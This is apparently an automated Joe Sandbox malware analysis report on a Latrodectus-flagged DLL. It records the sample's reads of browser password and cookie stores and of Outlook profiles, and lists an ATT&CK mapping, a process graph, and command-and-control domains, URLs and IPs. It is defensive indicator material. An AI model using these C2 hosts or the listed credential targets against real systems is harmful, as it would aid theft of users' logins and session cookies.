                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\CookiesJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected Latrodectus
                      Source: Yara matchFile source: 3.2.rundll32.exe.14614300000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.146142f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.146142f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.237c16b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.14614300000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.237c16c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.237c16c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000003.3416839119.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2270260674.00000146142F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.3502863339.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.3367002817.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.3124323699.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2008946508.00000237C16B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.3178827371.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.3440249504.000001E3B56E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.3416817098.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.3264216780.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.3041610792.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2270295766.0000014614300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2008986338.00000237C16C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 180, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Valid Accounts                      		131
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      Exploitation for Privilege Escalation                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		2
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API                      		1
                      Valid Accounts                      		1
                      DLL Side-Loading                      		2
                      Obfuscated Files or Information                      		LSASS Memory1
                      Account Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		21
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job                      		11
                      Windows Service                      		1
                      Valid Accounts                      		1
                      DLL Side-Loading                      		Security Account Manager2
                      File and Directory Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		3
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts12
                      Service Execution                      		1
                      Scheduled Task/Job                      		11
                      Access Token Manipulation                      		1
                      File Deletion                      		NTDS28
                      System Information Discovery                      		Distributed Component Object ModelInput Capture14
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchd1
                      Registry Run Keys / Startup Folder                      		11
                      Windows Service                      		1
                      Masquerading                      		LSA Secrets4101
                      Security Software Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts112
                      Process Injection                      		1
                      Valid Accounts                      		Cached Domain Credentials13
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                      Scheduled Task/Job                      		13
                      Virtualization/Sandbox Evasion                      		DCSync3
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job1
                      Registry Run Keys / Startup Folder                      		11
                      Access Token Manipulation                      		Proc Filesystem1
                      Application Window Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                      Process Injection                      		/etc/passwd and /etc/shadow1
                      System Owner/User Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Rundll32                      		Network Sniffing1
                      Remote System Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture21
                      System Network Configuration Discovery                      		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432373 Sample: 360total.dll.exe Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 77 pewwhranet.com 2->77 79 jarinamaers.shop 2->79 81 grizmotras.com 2->81 109 Found malware configuration 2->109 111 Multi AV Scanner detection for dropped file 2->111 113 Multi AV Scanner detection for submitted file 2->113 115 3 other signatures 2->115 12 loaddll64.exe 1 2->12         started        14 chrome.exe 9 2->14         started        signatures3 process4 dnsIp5 17 cmd.exe 1 12->17         started        20 rundll32.exe 12->20         started        22 conhost.exe 12->22         started        27 2 other processes 12->27 91 192.168.2.4 unknown unknown 14->91 93 192.168.2.5, 137, 138, 443 unknown unknown 14->93 95 239.255.255.250 unknown Reserved 14->95 24 chrome.exe 14->24         started        process6 dnsIp7 97 Uses net.exe to modify the status of services 17->97 99 Uses ipconfig to lookup or modify the Windows network settings 17->99 101 Performs a network lookup / discovery via net view 17->101 29 rundll32.exe 2 17->29         started        103 Contains functionality to compare user and computer (likely to detect sandboxes) 20->103 105 Contains functionality to detect sleep reduction / modifications 20->105 33 WerFault.exe 20 16 20->33         started        35 WerFault.exe 4 16 20->35         started        89 www.google.com 142.250.217.228, 443, 49712, 49713 GOOGLEUS United States 24->89 signatures8 process9 file10 75 C:\Users\user\AppData\...\Update_27361bf8.dll, PE32+ 29->75 dropped 125 Deletes itself after installation 29->125 37 rundll32.exe 22 29->37         started        signatures11 process12 dnsIp13 83 jarinamaers.shop 104.21.46.75, 443, 49745, 49746 CLOUDFLARENETUS United States 37->83 85 pewwhranet.com 104.21.84.207, 443, 49781, 49784 CLOUDFLARENETUS United States 37->85 87 grizmotras.com 172.67.219.28, 443, 49750, 49751 CLOUDFLARENETUS United States 37->87 117 System process connects to network (likely due to code injection or exploit) 37->117 119 Tries to steal Mail credentials (via file / registry access) 37->119 121 Tries to harvest and steal browser information (history, passwords, etc) 37->121 41 cmd.exe 1 37->41         started        43 cmd.exe 37->43         started        46 cmd.exe 37->46         started        48 8 other processes 37->48 signatures14 process15 signatures16 50 systeminfo.exe 2 1 41->50         started        53 conhost.exe 41->53         started        123 Performs a network lookup / discovery via net view 43->123 55 conhost.exe 43->55         started        57 net.exe 43->57         started        65 2 other processes 46->65 59 net.exe 48->59         started        61 net.exe 48->61         started        63 conhost.exe 48->63         started        67 12 other processes 48->67 process17 signatures18 107 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 50->107 69 WmiPrvSE.exe 50->69         started        71 net1.exe 59->71         started        73 net1.exe 61->73         started        process19

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      360total.dll.dll18%ReversingLabsWin32.Trojan.Generic

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll18%ReversingLabsWin32.Trojan.Generic

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://grizmotras.com/c0%Avira URL Cloudsafe
                      https://grizmotras.com/live/My0%Avira URL Cloudsafe
                      https://grizmotras.com/0%Avira URL Cloudsafe
                      ftp://ftp%2desktop.ini0%Avira URL Cloudsafe
                      https://jarinamaers.shop/ive/dOIDInfo0%Avira URL Cloudsafe
                      https://pewwhranet.com/0%Avira URL Cloudsafe
                      https://grizmotras.com/p0%Avira URL Cloudsafe
                      https://startmast.shop/live/0%Avira URL Cloudsafe
                      https://pewwhranet.com/live/)0%Avira URL Cloudsafe
                      https://grizmotras.com/live/ras.com/live/0%Avira URL Cloudsafe
                      https://pewwhranet.com/live/ll0%Avira URL Cloudsafe
                      https://grizmotras.com/live/URLS1https://pewwhranet.com/live/0%Avira URL Cloudsafe
                      https://jarinamaers.shop/V%0%Avira URL Cloudsafe
                      https://jarinamaers.shop/files/stkm.bin0%Avira URL Cloudsafe
                      https://grizmotras.com/live/1-00%Avira URL Cloudsafe
                      https://jarinamaers.shop/0%Avira URL Cloudsafe
                      https://grizmotras.com/x0%Avira URL Cloudsafe
                      https://pewwhranet.com/live/0%Avira URL Cloudsafe
                      https://grizmotras.com/live/e0%Avira URL Cloudsafe
                      https://grizmotras.com/live/0%Avira URL Cloudsafe
                      https://grizmotras.com/live/d0%Avira URL Cloudsafe
                      https://grizmotras.com/live/30%Avira URL Cloudsafe
                      https://grizmotras.com/live/o0%Avira URL Cloudsafe
                      https://jarinamaers.shop/files/stkm.binZ&XRr0%Avira URL Cloudsafe
                      https://pewwhranet.com/l0%Avira URL Cloudsafe
                      https://grizmotras.com/live/60%Avira URL Cloudsafe
                      https://jarinamaers.shop/live/0%Avira URL Cloudsafe
                      https://jarinamaers.shop/$0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      jarinamaers.shop
                      		104.21.46.75
                      		truetrue
                        		unknown
                        pewwhranet.com
                        		104.21.84.207
                        		truetrue
                          		unknown
                          grizmotras.com
                          		172.67.219.28
                          		truetrue
                            		unknown
                            www.google.com
                            		142.250.217.228
                            		truefalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGOKysLEGIjDP9RPIyWXG6yqz56jt32vlp9eant7g-v2niK8akWf-XW5L6XSYUi8PVE7hkJBYZJgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                                		high
                                https://www.google.com/async/newtab_promosfalse
                                  		high
                                  https://startmast.shop/live/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://jarinamaers.shop/files/stkm.bintrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://pewwhranet.com/live/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.google.com/async/ddljson?async=ntp:2false
                                    		high
                                    https://grizmotras.com/live/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                      		high
                                      https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGOKysLEGIjCpcmGUPeBLMAxrx6A3m-HmimiV3M4DW_xd1u12h5Ub_NV02_HrDnvzsp-9u9svldcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                                        		high
                                        https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                          		high
                                          https://jarinamaers.shop/live/true
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://grizmotras.com/crundll32.exe, 00000008.00000003.5438396809.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5444119340.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5948067019.000001E3B563F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://jarinamaers.shop/ive/dOIDInforundll32.exe, 00000008.00000003.3330399474.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3331001933.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264068559.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264129627.000001E3B3737000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://pewwhranet.com/rundll32.exe, 00000008.00000003.5096342846.000001E3B3739000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5438396809.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5444119340.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096659015.000001E3B3745000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://pconf.f.360.cn/safe_update.phprundll32.exefalse
                                            		high
                                            ftp://ftp%2desktop.inirundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.drfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            https://grizmotras.com/live/Myrundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://grizmotras.com/rundll32.exe, 00000008.00000003.5096342846.000001E3B3739000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5438396809.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5444119340.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096149688.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5948067019.000001E3B563F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3376871202.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096659015.000001E3B3745000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096519497.000001E3B3737000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://upx.sf.netAmcache.hve.9.drfalse
                                              		high
                                              https://pewwhranet.com/live/)rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://grizmotras.com/live/ras.com/live/rundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://grizmotras.com/prundll32.exe, 00000008.00000003.5096519497.000001E3B3737000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://grizmotras.com/live/URLS1https://pewwhranet.com/live/rundll32.exe, 00000008.00000003.3416705178.000001E3B5940000.00000040.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://pewwhranet.com/live/llrundll32.exe, 00000008.00000003.5438623787.000001E3B3753000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://jarinamaers.shop/V%rundll32.exe, 00000008.00000003.5096540598.000001E3B36C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://grizmotras.com/xrundll32.exe, 00000008.00000003.5096342846.000001E3B3739000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3376871202.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096659015.000001E3B3745000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://grizmotras.com/live/1-0rundll32.exe, 00000008.00000003.5096540598.000001E3B36C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://jarinamaers.shop/rundll32.exe, 00000008.00000003.3365882413.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3331001933.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264068559.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264129627.000001E3B3737000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://pscan.f.360.cn/safe_update.phprundll32.exefalse
                                                		high
                                                https://grizmotras.com/live/erundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://dr.f.360.cn/scanlistrundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.drfalse
                                                  		high
                                                  https://grizmotras.com/live/drundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://grizmotras.com/live/3rundll32.exe, 00000008.00000003.5096540598.000001E3B3702000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clierundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.drfalse
                                                    		high
                                                    https://grizmotras.com/live/orundll32.exe, 00000008.00000003.5096681496.000001E3B3752000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096318073.000001E3B374D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://sconf.f.360.cn/client_security_confrundll32.exefalse
                                                      		high
                                                      https://pewwhranet.com/lrundll32.exe, 00000008.00000003.5096342846.000001E3B3739000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5949266848.000001E3B373D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096659015.000001E3B3745000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://dr.f.360.cn/scanrundll32.exefalse
                                                        		high
                                                        https://jarinamaers.shop/$rundll32.exe, 00000008.00000003.3264068559.000001E3B3737000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3264129627.000001E3B3737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://jarinamaers.shop/files/stkm.binZ&XRrrundll32.exe, 00000008.00000003.3365701357.000001E3B3702000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3365798220.000001E3B3702000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3365882413.000001E3B3703000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://grizmotras.com/live/6rundll32.exe, 00000008.00000003.5096540598.000001E3B3702000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        142.250.217.228
                                                        		www.google.comUnited States
                                                        		15169GOOGLEUSfalse
                                                        104.21.46.75
                                                        		jarinamaers.shopUnited States
                                                        		13335CLOUDFLARENETUStrue
                                                        172.67.219.28
                                                        		grizmotras.comUnited States
                                                        		13335CLOUDFLARENETUStrue
                                                        239.255.255.250
                                                        		unknownReserved
                                                        		unknownunknownfalse
                                                        104.21.84.207
                                                        		pewwhranet.comUnited States
                                                        		13335CLOUDFLARENETUStrue

                                                        Private

                                                        IP
                                                        192.168.2.4
                                                        192.168.2.5

                                                        General Information

                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                        Analysis ID:1432373
                                                        Start date and time:2024-04-26 23:14:19 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 15m 25s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:58
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
